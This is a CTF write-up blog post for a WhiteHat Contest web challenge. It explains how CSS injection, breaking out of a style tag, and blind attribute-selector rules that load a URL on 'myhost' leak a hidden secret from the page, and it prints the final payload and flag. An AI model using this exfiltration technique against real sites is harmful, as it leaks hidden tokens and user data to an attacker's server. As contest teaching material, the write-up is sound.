[WhiteHat Contest 11] Ultimate Design Tool – web100

Challenge:

http://118.70.80.143:8104/

The challenge is about CSS Injection, when you click Share your button!, you will post to push.php something like this

csscode={width:+100px;+font-size:+100px;+height:+1px;+line-height:+1px;+border-width:+1px;}&submit=Share+your+button!

Wow, its CSS! I change something in {} to recheck

csscode={color:red;}&submit=Share+your+button!

red

The color of text turn red.

Let’s view the source code:

sc

Notice 1:

<style>#button {color:red}</style>

so our input will be placed after #button, let make some injection and see if it would affect

csscode=</style><style>#button {color:yellow;}&submit=Share+your+button!

yellow

Well the text color turn to yellow.

Notice 2:

                <!-- Admin only ... 
                <span value="secret"></span> 
                -->

Obviously, we need to leak “secret”, it is flag of this challenge. How to?

Let me talk about CSS
CSS stands for Cascading Style Sheets and it’s used to customize how websites look.
Here the CSS syntax:

selector { property1: value1; property2: value2; }

so if we want to customize span tag, just write:

span { color:red }

But how to select value attribute? Here the solution:

http://www.w3schools.com/cssref/css_selectors.asp

so our payload become

span[value]{color:red}

I decide to do some trick, called blind CSS injection:

span[value$='1']{content: url('http://myhost/?i')}

If the last char of “secret” is ‘1’, then it loads my host, and i’ll know, if not, nothing happen

Move on

span[value$='41']{content: url('http://myhost/?i')}

If the last two chars of “secret” is ’41’, then it loads my host, and i’ll know, if not, nothing happen

Combine 2 notice, final payload is:

csscode=</style><style>span[value='662f32aeb6041954dfac4a83523bc3eae72b5441'] {content: url('http://myhost/?i')}&submit=Share%2Byour%2Bbutton!

Flag: 662f32aeb6041954dfac4a83523bc3eae72b5441
Sorry for my bad engrish

3 thoughts on “[WhiteHat Contest 11] Ultimate Design Tool – web100

  1. Pingback: WhiteHat Contest 11 – Ultimate Design Tool | BabyPhD CTF Team

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s